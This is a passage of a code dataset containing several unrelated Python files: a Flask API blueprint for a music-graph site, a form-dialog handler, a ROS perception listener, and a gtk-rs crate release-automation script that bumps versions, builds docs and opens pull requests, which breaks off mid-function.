action=\"store_true\",\n help=\"plot time traces for the given \"\n \"basis sizes and regularization parameters \"\n \"at the specified monitoring locations\")\n parser.add_argument(\"-sf\", \"--statistical-features\", action=\"store_true\",\n help=\"plot spatial averages and species integrals \"\n \"for the ROM with the given basis size and \"\n \"regularization parameters\")\n\n # Other keyword arguments\n parser.add_argument(\"-r\", \"--modes\", type=int, required=True,\n help=\"number of POD modes used to project data\")\n parser.add_argument(\"-reg\", \"--regularization\", type=float, required=True,\n help=\"regularization parameter used in ROM training\")\n parser.add_argument(\"-loc\", \"--location\", type=int, nargs='+',\n default=config.MONITOR_LOCATIONS,\n help=\"monitor locations for time trace plots\")\n\n # Do the main routine.\n args = parser.parse_args()\n main(trainsize=args.trainsize, r=args.modes, reg=args.regularization,\n plotTimeTrace=args.time_traces, elems=args.location,\n plotStatisticalFeatures=args.statistical_features)\n","sub_path":"step4_plot.py","file_name":"step4_plot.py","file_ext":"py","file_size_in_byte":15302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"262953083","text":"# -*- encoding: utf-8 -*-\nfrom flask import Blueprint\nfrom flask import request\nfrom flask import jsonify\n\nfrom discograph import decorators\nfrom discograph import exceptions\nfrom discograph import helpers\n\n\nblueprint = Blueprint('api', __name__, template_folder='templates')\n\n\n@blueprint.route('/random')\n@decorators.limit(max_requests=60, period=60)\ndef route__api__random():\n role_names = ['Alias', 'Member Of']\n entity_type, entity_id = helpers.discograph_api.get_random_entity(role_names=role_names)\n entity_type = {\n 1: 'artist',\n 2: 'label',\n }[entity_type]\n data = {'center': '{}-{}'.format(entity_type, entity_id)}\n return 
jsonify(data)\n\n\n@blueprint.route('/artist/network/<int:artist_id>')\n@decorators.limit(max_requests=60, period=60)\ndef route__api__artist__network__artist_id(artist_id):\n on_mobile = request.MOBILE\n data = helpers.discograph_api.get_artist_network(artist_id, on_mobile=on_mobile)\n if data is None:\n raise exceptions.APIError()\n return jsonify(data)\n\n\n@blueprint.route('/search/<search_string>')\n@decorators.limit(max_requests=120, period=60)\ndef route__api__search(search_string):\n data = helpers.discograph_api.search_entities(search_string)\n return jsonify(data)\n\n\n@blueprint.route('/ping')\n@decorators.limit(max_requests=200, period=60)\ndef route__api__ping():\n print('PING', request.remote_addr)\n return jsonify({'ping': True})","sub_path":"discograph/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"569366042","text":"\nclass fActivityPesertaBeasiswa:\n def __init__(self, formObj, parentForm):\n self.app = formObj.ClientApplication\n if parentForm!=None:\n self.parentForm = parentForm\n else:\n self.parentForm = None\n\n def Show(self):\n self.FormContainer.Show()\n\n def bCancelClick(self, button):\n button.ExitAction = 2\n if self.parentForm != None:\n self.parentForm.FormObject.Close(2)\n\n def bSaveClick(self, button):\n\n ph = self.app.CreatePacket()\n packet = ph.Packet\n\n self.FormObject.CommitBuffer()\n ph = self.FormObject.GetDataPacket()\n try:\n res = self.FormObject.CallServerMethod('SimpanData', ph)\n except:\n raise\n \n\n\n button.ExitAction = 1\n if self.parentForm != None:\n self.parentForm.FormObject.Close(1)\n \n def AfterAgendaLookup(self, sender, linkui):\n uipart = self.uipinit\n uipart.Edit()\n uipart.aid = uipart.GetFieldValue('LAgenda.AgendaItemTemplateId')\n\n def AfterMustahiqLookup(self, sender, linkui):\n uipart = self.uipinit\n uipart.Edit()\n uipart.msid = uipart.GetFieldValue('Peserta.MustahiqId')\n uipart.pid = uipart.GetFieldValue('Peserta.ProductId')\n uipart.SetFieldValue('Pendamping.CompanionId', uipart.GetFieldValue('Peserta.CompanionId'))\n ph = self.app.CreateValues(['key', uipart.GetFieldValue('Peserta.CompanionId')])\n res = self.FormObject.CallServerMethod('GetPendamping', ph)\n #raise 'tes', res.FirstRecord.nama\n uipart.SetFieldValue('Pendamping.LCompanion.LCustomer.CustomerName', res.FirstRecord.nama)\n self.peserta_Pendamping.Enabled = 0\n self.peserta_Peserta.Enabled = 0\n \n def AfterPendampingLookup(self, sender, linkui):\n sender.Enabled = 0\n \n def BeforeMustahiqLookup(self, sender, linkui):\n uipart = self.uipinit\n cid = uipart.GetFieldValue('Pendamping.CompanionId')\n if cid not in (None,'', 0):\n linkui.OQLText = \"select from MustahiqProduct \\\n [CompanionId = %d] \\\n (MustahiqExtNumber, \\\n LMustahiq.LCustomer.CustomerName , \\\n MustahiqId, \\\n ProductId, \\\n CompanionId, \\\n self);\" % cid\n return 1\n\n","sub_path":"dialogs/Beasiswa/fActivityPesertaBeasiswa_intr.py","file_name":"fActivityPesertaBeasiswa_intr.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"98794536","text":"#!/usr/bin/env python\nimport os\nimport os.path\nimport sys\nimport signal\nimport rospy\nimport rosparam\n\nfrom sensor_msgs.msg import *\nfrom vision_msgs.msg import *\nfrom geometry_msgs.msg import *\nfrom std_msgs.msg import *\nfrom socialrobot_perception_msgs.srv import *\nfrom socialrobot_perception_msgs.msg import *\nfrom 
tf.transformations import euler_from_quaternion, quaternion_from_euler\n\n\nclass PerceptionListener():\n def __init__(self):\n self.obj_name2id={}\n\n self.current_obstacles = {}\n self.current_robots = {}\n self.current_joints = {}\n\n self.robot_count=0\n\n rospy.Subscriber('/joint_states', JointState, self.callback_joints, queue_size=10)\n rospy.Subscriber('/sim_ros_interface/robots_pose_10', Float64MultiArray, self.callback_robot, queue_size=10)\n rospy.Subscriber('/sim_ros_interface/robots_pose_11', Float64MultiArray, self.callback_robot, queue_size=10)\n rospy.Subscriber('/sim_ros_interface/objects_pose', Objects, self.callback_objects, queue_size=10)\n self.pub_robot = rospy.Publisher(\"/visual_robot_perceptions\", Float32MultiArray, queue_size=10)\n self.pub_objects = rospy.Publisher(\"/objects_infos\", Float32MultiArray, queue_size=10)\n self.pub_joints = rospy.Publisher(\"/joint_statess\", JointState, queue_size=10)\n\n def prepare(self):\n dir_path = os.path.dirname(os.path.realpath(__file__))+\"/\"\n with open(dir_path+'object_list.txt','r') as f:\n i=0\n for line in f.readlines():\n tmp=line.lower().strip()\n if not tmp:continue\n self.obj_name2id[tmp]=i;i+=1\n #for k, v in self.obj_name2id.items():\n # print(k, v)\n \n\n def publish_objects(self):\n #objs = Float32MultiArray()\n for idx, dat in self.current_obstacles.items():\n #obj = Float32MultiArray()\n obj_info = []\n\n\n try:i = self.obj_name2id[dat.name.data]\n except:continue#i = int(dat.name.data.split('_')[-1])\n x = dat.bb3d.center.position.x * 1.0\n y = dat.bb3d.center.position.y * 1.0\n z = dat.bb3d.center.position.z * 1.0\n a = dat.bb3d.center.orientation.x * 1.0\n b = dat.bb3d.center.orientation.y * 1.0\n c = dat.bb3d.center.orientation.z * 1.0\n d = dat.bb3d.center.orientation.w * 1.0\n width = dat.bb3d.size.y * 1.0\n depth = dat.bb3d.size.x * 1.0\n height = dat.bb3d.size.z * 1.0\n \n orientation_list = [a, b, c, d]\n (a, b, c) = euler_from_quaternion(orientation_list) # object center orientation\n\n obj_info.append(x)\n obj_info.append(y)\n obj_info.append(z)\n obj_info.append(a)\n obj_info.append(b)\n obj_info.append(c)\n obj_info.append(d)\n obj_info.append(width)\n obj_info.append(depth)\n obj_info.append(height)\n obj_info.append(i)\n\n #print(obj_info)\n \n #objs.append(obj) \n #obj.data = obj_info\n self.pub_objects.publish(data=obj_info)\n\n def update(self):\n self.publish_objects()\n #self.publish_robot() \n\n def callback_objects(self, data):\n self.current_obstacles = {}\n for idx, dat in enumerate(data.detected_objects):\n self.current_obstacles[idx] = dat\n\n def callback_robot(self, data):\n print(data)\n try:\n robot_info = []\n idx = data.data[6]\n d, w, h = 0, 0, 0\n\n robot_info.append(data.data[0]) # x\n robot_info.append(data.data[1]) # y\n robot_info.append(data.data[2]) # z\n robot_info.append(data.data[3]) # a\n robot_info.append(data.data[4]) # b\n robot_info.append(data.data[5]) # c\n \n if idx == 10.0:\n d = 5.4177e-01 #0.64001\n w = 5.4177e-01#0.64001\n h = 6.9385e-01#1.20000\n elif idx == 11.0:\n d = 0.05\n w = 0.05\n h = 0.05 # 0.07\n elif idx == 12.0:\n d = 0.05\n w = 0.05\n h = 0.05\n else:\n d = 0\n w = 0\n h = 0\n\n robot_info.append(d) # d\n robot_info.append(w) # w\n robot_info.append(h) # h\n\n robot_info.append(data.data[6]) # x\n\n self.pub_robot.publish(data=robot_info)\n except:pass\n\n def callback_joints(self, data):\n self.pub_joints.publish(data)\n # LFinger_1,LFinger_2,LFinger_3,RFinger_1,RFinger_2,RFinger_3,fridge_top_joint,fridge_bottom_joint\n 
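# the JointState message is forwarded unchanged to the \"/joint_statess\" topic; the joint names above are what the simulator publishes\n 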
#print(data)\n\n\n##############################\n# Main function\n##############################\nif __name__ == '__main__':\n # ros initialize\n rospy.init_node('perception_listener') \n\n # perception manager\n pm = PerceptionListener()\n pm.prepare()\n\n # Start\n rospy.loginfo('[PerceptionListener] Service Started!')\n\n\n loop_freq = 100 # 100 Hz\n r = rospy.Rate(loop_freq)\n while not rospy.is_shutdown():\n pm.update()\n r.sleep()\n","sub_path":"perception_listener/src/scripts/perception_listener_cloud.py","file_name":"perception_listener_cloud.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"457549415","text":"#!/bin/python3\n\nfrom contextlib import contextmanager\nimport datetime\nimport errno\nimport time\nimport shutil\nimport sys\nimport tempfile\nfrom os import listdir, sep as os_sep\nfrom os.path import isfile, join\n\n# local imports\nimport consts\nfrom args import Arguments, UpdateType\nfrom github import Github\nfrom globals import CRATES_VERSION, PULL_REQUESTS, SEARCH_INDEX, SEARCH_INDEX_BEFORE\nfrom globals import SEARCH_INDEX_AFTER\nfrom my_toml import TomlHandler\nfrom utils import add_to_commit, clone_repo, exec_command_and_print_error, get_features\nfrom utils import checkout_target_branch, get_file_content, write_error, write_into_file\nfrom utils import commit, commit_and_push, create_pull_request, push, revert_changes, write_msg\nfrom utils import create_tag_and_push, get_last_commit_date, merging_branches, publish_crate\nfrom utils import check_rustdoc_is_nightly, check_if_up_to_date\n\n\n@contextmanager\ndef temporary_directory():\n name = tempfile.mkdtemp()\n try:\n yield name\n finally:\n try:\n shutil.rmtree(name)\n except OSError as err:\n # if the directory has already been removed, no need to raise an error\n if err.errno != errno.ENOENT:\n raise\n\n\n# Doesn't handle version numbers containing anything other than numbers and '.'!\ndef update_version(version, update_type, section_name, place_type=\"section\"):\n version_split = version.replace('\"', '').split('.')\n if len(version_split) != 3:\n # houston, we've got a problem!\n write_error('Invalid version in {} \"{}\": {}'.format(place_type, section_name, version))\n return None\n if update_type == UpdateType.MINOR:\n version_split[update_type] = str(int(version_split[update_type]) + 1)\n elif update_type == UpdateType.MEDIUM:\n version_split[update_type] = str(int(version_split[update_type]) + 1)\n version_split[UpdateType.MINOR] = '0'\n else:\n version_split[update_type] = str(int(version_split[update_type]) + 1)\n version_split[UpdateType.MEDIUM] = '0'\n version_split[UpdateType.MINOR] = '0'\n return '\"{}\"'.format('.'.join(version_split))\n\n\ndef check_and_update_version(entry, update_type, dependency_name, versions_update):\n if entry.startswith('\"') or entry.startswith(\"'\"):\n return update_version(entry, update_type, dependency_name, place_type=\"dependency\")\n # get version and update it\n entry = [e.strip() for e in entry.split(',')]\n dic = {}\n for part in entry:\n if part.startswith('{'):\n part = part[1:].strip()\n if part.endswith('}'):\n part = part[:-1].strip()\n part = [p.strip() for p in part.split('=')]\n dic[part[0]] = part[1]\n if part[0] == 'version':\n old_version = part[1]\n new_version = update_version(old_version, update_type, dependency_name,\n place_type=\"dependency\")\n if new_version is None:\n return None\n # Mostly for debugging, not really 
useful otherwise...\n versions_update.append({'dependency_name': dependency_name,\n 'old_version': old_version,\n 'new_version': new_version})\n # update_version() already returns the value wrapped in quotes\n dic[part[0]] = new_version\n return '{{{}}}'.format(', '.join(['{} = {}'.format(entry, dic[entry]) for entry in dic]))\n\n\ndef find_crate(crate_name):\n for entry in consts.CRATE_LIST:\n if entry['crate'] == crate_name:\n return True\n return False\n\n\ndef update_crate_version(repo_name, crate_name, crate_dir_path, temp_dir, specified_crate):\n file_path = join(join(join(temp_dir, repo_name), crate_dir_path), \"Cargo.toml\")\n output = file_path.replace(temp_dir, \"\")\n if output.startswith('/'):\n output = output[1:]\n write_msg('=> Updating crate versions for {}'.format(file_path))\n content = get_file_content(file_path)\n if content is None:\n return False\n toml = TomlHandler(content)\n for section in toml.sections:\n if section.name == 'package':\n section.set('version', CRATES_VERSION[crate_name])\n elif specified_crate is not None:\n continue\n elif section.name.startswith('dependencies.') and find_crate(section.name[13:]):\n if specified_crate is None and section.name[13:] not in CRATES_VERSION:\n input('\"{}\" dependency not found in versions for crate \"{}\"...'\n .format(section.name[13:], crate_name))\n continue\n section.set('version', CRATES_VERSION[section.name[13:]])\n elif section.name == 'dependencies':\n for entry in section.entries:\n if find_crate(entry['key']):\n section.set(entry['key'], CRATES_VERSION[entry['key']])\n result = write_into_file(file_path, str(toml))\n write_msg('=> {}: {}'.format(output.split(os_sep)[-2],\n 'Failure' if result is False else 'Success'))\n return result\n\n\ndef update_repo_version(repo_name, crate_name, crate_dir_path, temp_dir, update_type, no_update):\n # pylint: disable=too-many-branches,too-many-locals\n file_path = join(join(join(temp_dir, repo_name), crate_dir_path), \"Cargo.toml\")\n output = file_path.replace(temp_dir, \"\")\n if output.startswith('/'):\n output = output[1:]\n write_msg('=> Updating versions for {}'.format(file_path))\n content = get_file_content(file_path)\n if content is None:\n return False\n toml = TomlHandler(content)\n versions_update = []\n for section in toml.sections:\n if (section.name == 'package' or\n (section.name.startswith('dependencies.') and find_crate(section.name[13:]))):\n version = section.get('version', None)\n if version is None:\n continue\n new_version = None\n if no_update is False:\n new_version = update_version(version, update_type, section.name)\n else:\n new_version = version\n if new_version is None:\n return False\n # Print the status directly if it's the crate's version.\n if section.name == 'package':\n write_msg('\\t{}: {} => {}'.format(output.split(os_sep)[-2], version, new_version))\n CRATES_VERSION[crate_name] = new_version\n else: # Otherwise add it to the list to print later.\n versions_update.append({'dependency_name': section.name[13:],\n 'old_version': version,\n 'new_version': new_version})\n section.set('version', new_version)\n elif section.name == 'dependencies':\n for entry in section.entries:\n if find_crate(entry):\n new_version = check_and_update_version(section.entries[entry],\n update_type,\n entry,\n [])\n section.set(entry, new_version)\n for update in versions_update:\n write_msg('\\t{}: {} => {}'.format(update['dependency_name'],\n update['old_version'],\n update['new_version']))\n out = str(toml)\n if not out.endswith(\"\\n\"):\n out += '\\n'\n result = True\n if no_update is False:\n # We 
only write into the file if we're not just getting the crates version.\n result = write_into_file(file_path, out)\n write_msg('=> {}: {}'.format(output.split(os_sep)[-2],\n 'Failure' if result is False else 'Success'))\n return result\n\n\ndef update_badges(repo_name, temp_dir, specified_crate):\n path = join(join(temp_dir, repo_name), \"_data/crates.json\")\n content = get_file_content(path)\n current = None\n out = []\n for line in content.split(\"\\n\"):\n if line.strip().startswith('\"name\": \"'):\n current = line.split('\"name\": \"')[-1].replace('\",', '')\n if specified_crate is not None and current != specified_crate:\n current = None\n elif line.strip().startswith('\"max_version\": \"') and current is not None:\n version = line.split('\"max_version\": \"')[-1].replace('\"', '').replace(',', '')\n out.append(line.replace('\": \"{}\"'.format(version),\n '\": {}'.format(CRATES_VERSION[current])) + '\\n')\n current = None\n continue\n out.append(line + '\\n')\n return write_into_file(path, ''.join(out).replace('\\n\\n', '\\n'))\n\n\ndef cleanup_doc_repo(temp_dir):\n path = join(temp_dir, consts.DOC_REPO)\n command = ['bash', '-c', 'cd {} && git rm -rf *'.format(path)]\n if not exec_command_and_print_error(command):\n input(\"Couldn't clean up docs! Try to fix it and then press ENTER to continue...\")\n\n\ndef build_docs(repo_name, temp_dir, extra_path, crate_name):\n # pylint: disable=too-many-locals\n path = join(join(temp_dir, repo_name), extra_path)\n features = get_features(join(path, 'Cargo.toml'))\n # We can't add \"--no-deps\" argument to cargo doc, otherwise we lose links to items of\n # other crates...\n #\n # Also, we run \"cargo update\" in case the lgpl-docs repository has been updated (so we get the\n # last version).\n command = ['bash', '-c',\n ('cd {} && cargo update && cargo rustdoc --no-default-features '\n '--features \"{}\"').format(path, features)]\n if not exec_command_and_print_error(command):\n input(\"Couldn't generate docs! Try to fix it and then press ENTER to continue...\")\n doc_folder = join(path, 'target/doc')\n try:\n file_list = ' '.join(['\"{}\"'.format(f) for f in listdir(doc_folder)\n if isfile(join(doc_folder, f))])\n except Exception as err:\n write_error('Error occured in build docs: {}'.format(err))\n input(\"It seems like the \\\"{}\\\" folder doesn't exist. Try to fix it then press ENTER...\"\n .format(doc_folder))\n # Copy documentation files\n command = ['bash', '-c',\n 'cd {} && cp -r \"{}\" {} \"{}\"'\n .format(doc_folder,\n crate_name.replace('-', '_'),\n file_list,\n join(temp_dir, consts.DOC_REPO))]\n if not exec_command_and_print_error(command):\n input(\"Couldn't copy docs! Try to fix it and then press ENTER to continue...\")\n # Copy source files\n destination = \"{}/src\".format(join(temp_dir, consts.DOC_REPO))\n command = ['bash', '-c',\n 'cd {0} && mkdir -p \"{1}\" && cp -r \"src/{2}\" \"{1}/\"'\n .format(doc_folder,\n destination,\n crate_name.replace('-', '_'))]\n if not exec_command_and_print_error(command):\n input(\"Couldn't copy doc source files! 
Try to fix it and then press ENTER to continue...\")\n search_index = join(path, 'target/doc/search-index.js')\n lines = get_file_content(search_index).split('\\n')\n before = True\n fill_extras = len(SEARCH_INDEX_BEFORE) == 0\n found = False\n for line in lines:\n if line.startswith('\"'):\n before = False\n # We need to be careful in here if we're in a sys repository (which should never be the\n # case!).\n if line.startswith('\"{}\":'.format(crate_name.replace('-', '_'))):\n if line.endswith('}\\\\'):\n line = line[:-1] + ',\\\\'\n SEARCH_INDEX.append(line)\n found = True\n elif fill_extras is True:\n if before is True:\n SEARCH_INDEX_BEFORE.append(line)\n else:\n SEARCH_INDEX_AFTER.append(line)\n if found is False:\n input(\"Couldn't find \\\"{}\\\" in `{}`!\\nTry to fix it and then press ENTER to continue...\"\n .format(crate_name.replace('-', '_'), search_index))\n\n\ndef end_docs_build(temp_dir):\n path = join(temp_dir, consts.DOC_REPO)\n revert_changes(consts.DOC_REPO, temp_dir,\n ['COPYRIGHT.txt', 'LICENSE-APACHE.txt', 'LICENSE-MIT.txt'])\n try:\n with open(join(path, 'search-index.js'), 'w') as file:\n file.write('\\n'.join(SEARCH_INDEX_BEFORE) + '\\n')\n if SEARCH_INDEX[-1].endswith(\"},\\\\\"):\n SEARCH_INDEX[-1] = SEARCH_INDEX[-1][:-2] + '\\\\' # we remove the last comma\n file.write('\\n'.join(SEARCH_INDEX))\n file.write('\\n'.join(SEARCH_INDEX_AFTER))\n add_to_commit(consts.DOC_REPO, temp_dir, ['.'])\n except Exception as err:\n write_error('An exception occured in \"end_docs_build\": {}'.format(err))\n input(\"Press ENTER to continue...\")\n input('If you want to prevent \"{}\" to be updated, now is the good time! Press ENTER to '\n 'continue...'.format(join(path, \"main.js\")))\n\n\ndef write_merged_prs(merged_prs, contributors, repo_url):\n content = ''\n for merged_pr in reversed(merged_prs):\n if merged_pr.title.startswith('[release] '):\n continue\n if merged_pr.author not in contributors:\n contributors.append(merged_pr.author)\n md_content = (merged_pr.title.replace('<', '<')\n .replace('>', '>')\n .replace('[', '\\\\[')\n .replace(']', '\\\\]')\n .replace('*', '\\\\*')\n .replace('_', '\\\\_'))\n content += ' * [{}]({}/pull/{})\\n'.format(md_content, repo_url, merged_pr.number)\n return content + '\\n'\n\n\ndef build_blog_post(repositories, temp_dir, token):\n # pylint: disable=too-many-locals\n write_msg('=> Building blog post...')\n\n content = '''---\nlayout: post\nauthor: {}\ntitle: {}\ncategories: [front, crates]\ndate: {}\n---\n\n* Write intro here *\n\n### Changes\n\nFor the interested ones, here is the list of the merged pull requests:\n\n'''.format(input('Enter author name: '), input('Enter title: '),\n time.strftime(\"%Y-%m-%d %H:00:00 +0000\"))\n contributors = []\n git = Github(token)\n oldest_date = None\n for repo in repositories:\n checkout_target_branch(repo, temp_dir, \"crate\")\n success, out, err = get_last_commit_date(repo, temp_dir)\n if not success:\n write_msg(\"Couldn't get PRs for '{}': {}\".format(repo, err))\n continue\n max_date = datetime.date.fromtimestamp(int(out))\n if oldest_date is None or max_date < oldest_date:\n oldest_date = max_date\n write_msg(\"Gettings merged PRs from {}...\".format(repo))\n merged_prs = git.get_pulls(repo, consts.ORGANIZATION, 'closed', max_date, only_merged=True)\n write_msg(\"=> Got {} merged PRs\".format(len(merged_prs)))\n if len(merged_prs) < 1:\n continue\n repo_url = '{}/{}/{}'.format(consts.GITHUB_URL, consts.ORGANIZATION, repo)\n content += '[{}]({}):\\n\\n'.format(repo, repo_url)\n content += 
write_merged_prs(merged_prs, contributors, repo_url)\n\n write_msg(\"Getting merged PRs from gir...\")\n merged_prs = git.get_pulls('gir', consts.ORGANIZATION, 'closed', oldest_date, only_merged=True)\n write_msg(\"=> Got {} merged PRs\".format(len(merged_prs)))\n if len(merged_prs) > 0:\n repo_url = '{}/{}/{}'.format(consts.GITHUB_URL, consts.ORGANIZATION, 'gir')\n content += ('All this was possible thanks to the [gtk-rs/gir]({}) project as well:\\n\\n'\n .format(repo_url))\n content += write_merged_prs(merged_prs, contributors, repo_url)\n\n content += 'Thanks to all of our contributors for their (awesome!) work on this release:\\n\\n'\n # Sort the contributors list alphabetically, case-insensitively.\n contributors = sorted(contributors, key=lambda s: s.casefold())\n content += '\\n'.join([' * [@{0}]({1}/{0})'.format(contributor, consts.GITHUB_URL)\n for contributor in contributors])\n content += '\\n'\n\n file_name = join(join(temp_dir, consts.BLOG_REPO),\n '_posts/{}-new-release.md'.format(time.strftime(\"%Y-%m-%d\")))\n try:\n with open(file_name, 'w') as outfile:\n outfile.write(content)\n write_msg('New blog post written into \"{}\".'.format(file_name))\n add_to_commit(consts.BLOG_REPO, temp_dir, [file_name])\n commit(consts.BLOG_REPO, temp_dir, \"Add new blog post\")\n except Exception as err:\n write_error('build_blog_post failed: {}'.format(err))\n write_msg('\\n=> Here is the blog post content:\\n{}\\n<='.format(content))\n write_msg('Done!')\n\n\ndef generate_new_tag(repository, temp_dir, specified_crate, args):\n # We make a new tag for every crate:\n #\n # * If it is a \"sys\" crate, then we add its name to the tag\n # * If not, then we just keep its version number\n for crate in args.crates:\n crate = crate['crate']\n if crate['repository'] == repository:\n if specified_crate is not None and crate['crate'] != specified_crate:\n continue\n tag_name = CRATES_VERSION[crate['crate']]\n if crate['crate'].endswith('-sys') or crate['crate'].endswith('-sys-rs'):\n tag_name = '{}-{}'.format(crate['crate'], tag_name)\n write_msg('==> Creating new tag \"{}\" for repository \"{}\"...'.format(tag_name,\n repository))\n create_tag_and_push(tag_name, repository, temp_dir)\n\n\ndef generate_new_branches(repository, temp_dir, specified_crate, args):\n # We make a new branch for every crate based on the current \"crate\" branch:\n #\n # * If it is a \"sys\" crate, then we ignore it.\n # * If not, then we create a new branch\n for crate in args.crates:\n crate = crate['crate']\n if crate['repository'] == repository:\n if specified_crate is not None and crate['crate'] != specified_crate:\n continue\n if crate['crate'].endswith('-sys') or crate['crate'].endswith('-sys-rs'):\n continue\n branch_name = CRATES_VERSION[crate['crate']]\n write_msg('==> Creating new branch \"{}\" for repository \"{}\"...'.format(branch_name,\n repository))\n push(repository, temp_dir, branch_name)\n\n\ndef update_doc_content_repository(repositories, temp_dir, token, no_push, args):\n if clone_repo(consts.DOC_CONTENT_REPO, temp_dir) is False:\n input('Try to fix the problem then press ENTER to continue...')\n write_msg(\"Done!\")\n repo_path = join(temp_dir, consts.DOC_CONTENT_REPO)\n write_msg(\"=> Generating documentation for crates...\")\n for repo in repositories:\n current = None\n for crate in args.crates:\n crate = crate['crate']\n if crate['repository'] == repo:\n current = crate\n break\n if current is None:\n input('No repository matches \"{}\", something is weird. 
(Press ENTER to continue)'.format(repo))\n continue\n if current.get(\"doc\", True) is False:\n continue\n write_msg('==> Generating documentation for \"{}\"'.format(current['crate']))\n path = join(temp_dir, current['repository'])\n command = ['bash', '-c',\n 'cd {} && make doc && mv vendor.md {}'.format(path,\n join(repo_path,\n current['crate']))]\n if not exec_command_and_print_error(command):\n input(\"Fix the error and then press ENTER\")\n write_msg('Done!')\n write_msg('Committing \"{}\" changes...'.format(consts.DOC_CONTENT_REPO))\n commit(consts.DOC_CONTENT_REPO, temp_dir, \"Update vendor files\")\n if no_push is False:\n push(consts.DOC_CONTENT_REPO, temp_dir, consts.MASTER_TMP_BRANCH)\n\n # We always make minor releases in here, no need for a more important one considering we don't\n # change the API.\n if update_repo_version(consts.DOC_CONTENT_REPO, consts.DOC_CONTENT_REPO, \"\",\n temp_dir, UpdateType.MINOR, False) is False:\n write_error('The update for the \"{}\" crate failed...'.format(consts.DOC_CONTENT_REPO))\n input('Fix the error and then press ENTER')\n commit(consts.DOC_CONTENT_REPO, temp_dir, \"Update version\")\n if no_push is False:\n push(consts.DOC_CONTENT_REPO, temp_dir, consts.MASTER_TMP_BRANCH)\n create_pull_request(consts.DOC_CONTENT_REPO, consts.MASTER_TMP_BRANCH, \"master\", token,\n False)\n input(('All done with the \"{}\" update: please merge the PR then press ENTER so the '\n 'publication can be performed...').format(consts.DOC_CONTENT_REPO))\n publish_crate(consts.DOC_CONTENT_REPO, \"\", temp_dir, consts.DOC_CONTENT_REPO,\n checkout_branch='master')\n write_msg('Ok all done! We can move forward now!')\n else:\n write_msg(('All done with \"{}\", but you still need to publish a new version if you want '\n 'the changes to be taken into account').format(consts.DOC_CONTENT_REPO))\n\n\ndef clone_repositories(args, temp_dir):\n write_msg('=> Cloning the repositories...')\n repositories = []\n for crate in args.crates:\n crate = crate['crate']\n if args.specified_crate is not None and crate['crate'] != args.specified_crate:\n continue\n if crate[\"repository\"] not in repositories:\n repositories.append(crate[\"repository\"])\n if clone_repo(crate[\"repository\"], temp_dir) is False:\n write_error('Cannot clone the \"{}\" repository...'.format(crate[\"repository\"]))\n return []\n if len(repositories) < 1:\n write_msg('No crate \"{}\" found. 
Aborting...'.format(args.specified_crate))\n return []\n if args.doc_only is False:\n if clone_repo(consts.BLOG_REPO, temp_dir, depth=1) is False:\n write_error('Cannot clone the \"{}\" repository...'.format(consts.BLOG_REPO))\n return []\n if clone_repo(consts.DOC_REPO, temp_dir, depth=1) is False:\n write_error('Cannot clone the \"{}\" repository...'.format(consts.DOC_REPO))\n return []\n write_msg('Done!')\n return repositories\n\n\ndef update_crates_versions(args, temp_dir, repositories):\n write_msg('=> Updating [master] crates version...')\n for crate in args.crates:\n update_type = crate['up-type']\n crate = crate['crate']\n if args.specified_crate is not None and crate['crate'] != args.specified_crate:\n continue\n if update_repo_version(crate[\"repository\"], crate[\"crate\"], crate[\"path\"],\n temp_dir, update_type,\n args.badges_only or args.tags_only) is False:\n write_error('The update for the \"{}\" crate failed...'.format(crate[\"crate\"]))\n return False\n write_msg('Done!')\n if args.badges_only is False and args.tags_only is False:\n write_msg('=> Committing{} to the \"{}\" branch...'\n .format(\" and pushing\" if args.no_push is False else \"\",\n consts.MASTER_TMP_BRANCH))\n for repo in repositories:\n commit(repo, temp_dir, \"Update versions [ci skip]\")\n if args.no_push is False:\n push(repo, temp_dir, consts.MASTER_TMP_BRANCH)\n write_msg('Done!')\n\n if args.no_push is False:\n write_msg('=> Creating PRs on master branch...')\n for repo in repositories:\n create_pull_request(repo, consts.MASTER_TMP_BRANCH, \"master\", args.token)\n write_msg('Done!')\n return True\n\n\ndef update_crate_repositories_branches(args, temp_dir, repositories):\n write_msg('=> Merging \"master\" branches into \"crate\" branches...')\n for repo in repositories:\n merging_branches(repo, temp_dir, \"master\")\n write_msg('Done!')\n\n write_msg('=> Updating [crate] crates version...')\n for crate in args.crates:\n crate = crate['crate']\n if args.specified_crate is not None and crate['crate'] != args.specified_crate:\n continue\n if update_crate_version(crate[\"repository\"], crate[\"crate\"], crate[\"path\"],\n temp_dir, args.specified_crate) is False:\n write_error('The update for the \"{}\" crate failed...'.format(crate[\"crate\"]))\n return False\n write_msg('Done!')\n\n write_msg('=> Committing{} to the \"{}\" branch...'\n .format(\" and pushing\" if args.no_push is False else \"\",\n consts.CRATE_TMP_BRANCH))\n for repo in repositories:\n commit(repo, temp_dir, \"Update versions [ci skip]\")\n if args.no_push is False:\n push(repo, temp_dir, consts.CRATE_TMP_BRANCH)\n write_msg('Done!')\n if args.no_push is False:\n write_msg('=> Creating PRs on crate branch...')\n for repo in repositories:\n create_pull_request(repo, consts.CRATE_TMP_BRANCH, \"crate\", args.token)\n write_msg('Done!')\n return True\n\n\ndef publish_crates(args, temp_dir):\n write_msg('+++++++++++++++')\n write_msg('++ IMPORTANT ++')\n write_msg('+++++++++++++++')\n write_msg('Almost everything has been done. 
